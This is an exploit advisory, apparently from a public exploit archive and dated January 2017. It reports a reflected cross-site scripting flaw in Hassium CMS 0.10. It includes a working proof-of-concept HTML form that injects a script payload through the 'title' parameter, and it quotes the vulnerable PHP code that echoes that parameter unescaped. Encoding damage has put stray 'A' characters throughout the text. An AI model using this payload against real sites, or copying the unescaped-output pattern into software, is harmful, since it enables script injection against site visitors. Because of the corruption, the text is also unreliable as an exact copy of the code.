Hassium CMS 0.10 Cross Site Scripting
Posted on 17 January 2017
*=============================================================| |A ExploitA Title:A A HassiumA CMSA CrossA SiteA Scripting | |A ExploitA Author:A AshiyaneA DigitalA SecurityA Team | |A VendorA Homepage:A http://www.hassium.org/index.php | |A DownloadA LinkA :A https://github.com/hassiumsoft/hasscms-app/archive/master.zip | |A VersionA :A VA 0.10 | |A PlatformA :A PHP | |A TestedA on:A A KaliA LinuxA | |A Date:A 1A /14A /A 2017 *=============================================================| |A ExploitA Code:A |A |<HTML> |<HEAD> |A A A A <TITLE>HassiumA CMSA CrossA SiteA Scripting</TITLE> |</HEAD> |<BODY> |<formA action="http://Localhost/hasscms-app-master/themes/candidate/media/jackbox/modules/jackbox_social.php"A method="get"> |A <inputA type="hidden"A name="title"A value=""/><script>alert('M.R.S.L.Y')</script>"> |</form> |</BODY> |</HTML> | *=======================| |A vulnerabilityA MethodA :A GET *=======================| |VulnerableA code: | |A A A <?php |A A A A A A A A |A A A A A A A A ifA (isset($_GET["title"]))A { |A A A A A A A A A A A A |A A A A A A A A A A A A $titleA =A $_GET["title"]; |A A A A A A A A A A A A printA str_replace("{contentTitle}",A $title,A '<metaA itemprop="name"A content="{contentTitle}"A />'); |A A A A A A A A } |A A A A A A A A |A A A A A A A A ifA (isset($_GET["poster"]))A { |A A A A A A A A A A A A |A A A A A A A A A A A A $posterA =A $_GET["poster"]; |A A A A A A A A A A A A printA str_replace("{imgPoster}",A $poster,A '<metaA itemprop="image"A content="{imgPoster}"A />'); |A A A A A A A A } |A A A A A A A A |A A A A A A A A ?> *=============================================================| |A SpecialA ThanksA ToA :A VirangarA ,A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O |A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O |A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A *=============================================================|